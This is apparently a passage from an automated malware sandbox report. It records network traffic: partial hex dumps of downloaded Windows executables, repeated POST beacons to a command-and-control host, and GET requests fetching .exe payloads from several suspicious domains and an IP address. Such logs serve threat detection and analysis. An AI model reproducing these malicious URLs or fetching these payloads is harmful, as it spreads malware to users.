00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 13 Jan 2022 23:16:18 GMTContent-Type: application/octet-streamContent-Length: 34272Last-Modified: Thu, 13 Jan 2022 21:50:37 GMTConnection: keep-aliveETag: "61e09ead-85e0"Expires: Thu, 20 Jan 2022 23:16:18 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 dc 34 e0 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 26 00 00 00 70 00 00 00 00 00 00 9e 45 00 00 00 20 00 00 00 c0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 00 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 45 00 00 57 00 00 00 00 60 00 00 b0 48 00 00 00 00 00 00 00 00 00 00 00 74 00 00 e0 11 00 00 00 c0 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 25 00 00 00 20 00 00 00 26 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b0 48 00 00 00 60 00 00 00 4a 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 00 00 00 02 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 45 00 00 00 00 00 00 48 00 00 00 02 00 05 00 60 26 00 00 cc 16 00 00 03 00 00 
00 08 00 00 06 2c 3d 00 00 18 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 dc 9c 13 30 fe 2b ae 5a d6 7a ac f3 43 b7 f3 d0 4f 41 f6 2c d8 0f c4 35 18 75 73 0e e1 16 be ef a3 3f 19 94 62 e8 f0 e1 8a fb 85 b8 87 59 42 e8 ad d3 f8 5b fd 4f 1a cd d7 dd 18 89 b6 a0 77 bf ba bb 4f 04 9e 5e 6e 66 4f 15 a1 dc 89 0c ac bd 32 89 5f 0e 1d 62 f1 53 25 4b bc 84 cf 67 2a e9 83 c4 fc ca 09 3e 4a 4e 65 92 0c e8 ad 3d 43 ca 30 5a 56 2c 40 69 a2 00 22 02 28 01 00 00 0a 00 2a 00 00 00 13 30 02 00 33 00 00 00 01 00 00 11 00 2b 0f 2b 14 2b 15 2b 16 2b 1b 2b 20 2b 00 2b 1f 2a 28 16 00 00 0a 2b ea 0a 2b e9 06 2b e8 28 05 00 00 06 2b e3 6f 17 00 00 0a 2b de 0b 2b dd 07 2b de 00 1b 30 06 00 af 00 00 00 02 00 00 11 00 00 20 00 0c 00 00 2b 04 00 00 de 0c 28 4f 00 00 0a 2b f5 26 00 00 de 00 d0 46 00 00 01 2b 57 72 01 00 00 70 28 02 00 00 06 72 29 00 00 70 28 02 00 00 06 72 2d 00 00 70 28 02 00 00 06 2b 3e 17 8d 18 00 00 01 25 16 d0 19 00 00 01 2b 36 a2 2b 3a 2b 3f 17 8d 01 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 13 Jan 2022 23:16:18 GMTContent-Type: application/octet-streamContent-Length: 226816Last-Modified: Thu, 13 Jan 2022 19:31:57 GMTConnection: keep-aliveETag: "61e07e2d-37600"Expires: Thu, 20 Jan 2022 23:16:18 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a7 79 e0 61 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 70 03 00 00 04 00 00 00 00 00 00 12 8e 03 00 00 20 00 00 00 a0 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 03 00 00 02 00 00 fc a7 03 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c0 8d 03 00 4f 00 00 00 00 a0 03 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 0c 00 00 00 88 8c 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 20 6e 03 00 00 20 00 00 00 70 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 00 00 00 00 a0 03 00 00 02 00 00 00 72 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 03 00 00 02 00 00 00 74 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f4 8d 03 00 00 00 00 00 48 00 00 00 02 00 05 00 00 98 00 00 d0 68 00 00 03 00 02 
00 01 00 00 06 d0 00 01 00 b8 8b 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6a 00 28 15 00 00 0a 00 16 28 16 00 00 0a 00 73 0a 00 00 06 28 17 00 00 0a 00 2a 26 02 28 18 00 00 0a 00 00 2a 00 00 00 13 30 02 00 39 00 00 00 01 00 00 11 00 7e 01 00 00 04 14 fe 01 0a 06 2c 22 00 72 01 00 00 70 d0 03 00 00 02 28 19 00 00 0a 6f 1a 00 00 0a 73 1b 00 00 0a 0b 07 80 01 00 00 04 00 7e 01 00 00 04 0c 2b 00 08 2a 00 00 00 13 30 01 00 0b 00 00 00 02 00 00 11 00 7e 02 00 00 04 0a 2b 00 06 2a 22 00 02 80 02 00 00 04 2a 13 30 03 00 21 00 00 00 03 00 00 11 00 28 03 00 00 06 72 63 00 00 70 7e 02 00 00 04 6f 1c 00 00 0a 0a 06 74 01 00 00 1b 0b 2b 00 07 2a 00 00 00 13 30 01 00 0b 00 00 00 04 00 00 11 00 7e 03 00 00 04 0a 2b 00 06 2a 22 02 28 1d 00 00 0a 00 2a 56 73 08 00 00 06 28 1e 00 00 0a 74 04 00 00 02 80 03 00 00 04 2a 5e 02 14 7d 04 00 00 04 02 28 1f 00 00 0a 00 00 02 28 14 00 00 06 00 2a 00 00 13 30 01 00 0f 00 00 00 05 00 00 11 00 73 38 00 00 06 0a 06 6f 20 00 00 0a
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: openresty | Date: Thu, 13 Jan 2022 23:16:21 GMT | Content-Type: application/octet-stream | Content-Length: 535232 | Last-Modified: Thu, 13 Jan 2022 19:32:17 GMT | Connection: keep-alive | ETag: "61e07e41-82ac0" | Expires: Thu, 20 Jan 2022 23:16:21 GMT | Cache-Control: max-age=604800 | Accept-Ranges: bytes
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: openresty | Date: Thu, 13 Jan 2022 23:16:21 GMT | Content-Type: application/octet-stream | Content-Length: 535232 | Last-Modified: Thu, 13 Jan 2022 21:51:04 GMT | Connection: keep-alive | ETag: "61e09ec8-82ac0" | Expires: Thu, 20 Jan 2022 23:16:21 GMT | Cache-Control: max-age=604800 | Accept-Ranges: bytes
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: openresty | Date: Thu, 13 Jan 2022 23:16:22 GMT | Content-Type: application/octet-stream | Content-Length: 2387648 | Last-Modified: Thu, 13 Jan 2022 20:12:05 GMT | Connection: keep-alive | ETag: "61e08795-246ec0" | Expires: Thu, 20 Jan 2022 23:16:22 GMT | Cache-Control: max-age=604800 | Accept-Ranges: bytes
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: openresty | Date: Thu, 13 Jan 2022 23:16:23 GMT | Content-Type: application/octet-stream | Content-Length: 2387648 | Last-Modified: Thu, 13 Jan 2022 21:51:33 GMT | Connection: keep-alive | ETag: "61e09ee5-246ec0" | Expires: Thu, 20 Jan 2022 23:16:23 GMT | Cache-Control: max-age=604800 | Accept-Ranges: bytes
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://lkoyuevdx.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 219 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://secxfi.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 336 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://vuafh.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 193 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://psxblf.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 272 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://dsdofcnp.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 170 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://obbsps.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 174 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ttkljrkl.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 199 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://fvjjmgnhpi.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 229 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://giblvuodn.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 338 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://unjilfapdr.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 368 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://bnrfjahkht.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 148 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://epntadtm.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 232 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: GET /downloads/toolspab3.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: privacy-tools-for-you-780.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://yevvbkvx.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 207 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://psfbiu.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 214 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: GET /install5.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: unicupload.top
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://phnfrhmjav.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 223 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://etxdniy.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 291 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://tlotvuqfn.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 263 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://bjfnimnu.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 356 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: GET /game.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://mkbyakqqj.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 221 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://reeitd.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 199 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://vnmaltjgi.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 153 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://fmegeducg.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 298 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: GET /6.php HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 185.7.214.171:8080
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ghiodndfpo.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 317 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://njpun.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 236 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://rmhfrtkprf.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 258 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ynkqvnpya.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 270 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://pnfnlpnysf.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 263 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://mosjbuj.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 361 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://oytdv.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 173 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://rljjkyrr.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 253 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://jpqcmep.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 285 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://fosbja.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 115 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://rcjgja.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 151 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://yivbbwxtct.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 155 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://dqwogmqhb.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 151 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://cvhsbw.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 116 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://oyghbp.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 333 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://yuvwrs.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 211 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://xkujdf.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 272 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://fyyanes.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 292 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://tyjpjf.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 321 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://rsxrkuta.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 295 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://jlgqjcjkdy.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 134 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://avcxisfo.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 363 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://mvsed.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 204 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://pgctyuwy.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 126 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://surulybuu.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 347 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://thylpwqt.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 169 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: GET /files/8474_1641976243_3082.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://rhglrb.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 354 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://dbxsgfe.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 192 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: GET /9.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: a0621298.xsph.ru
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://aoavvcteey.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 122 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://tqnyuoui.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 285 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://nqlstnrw.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 331 | Host: host-data-coin-11.com
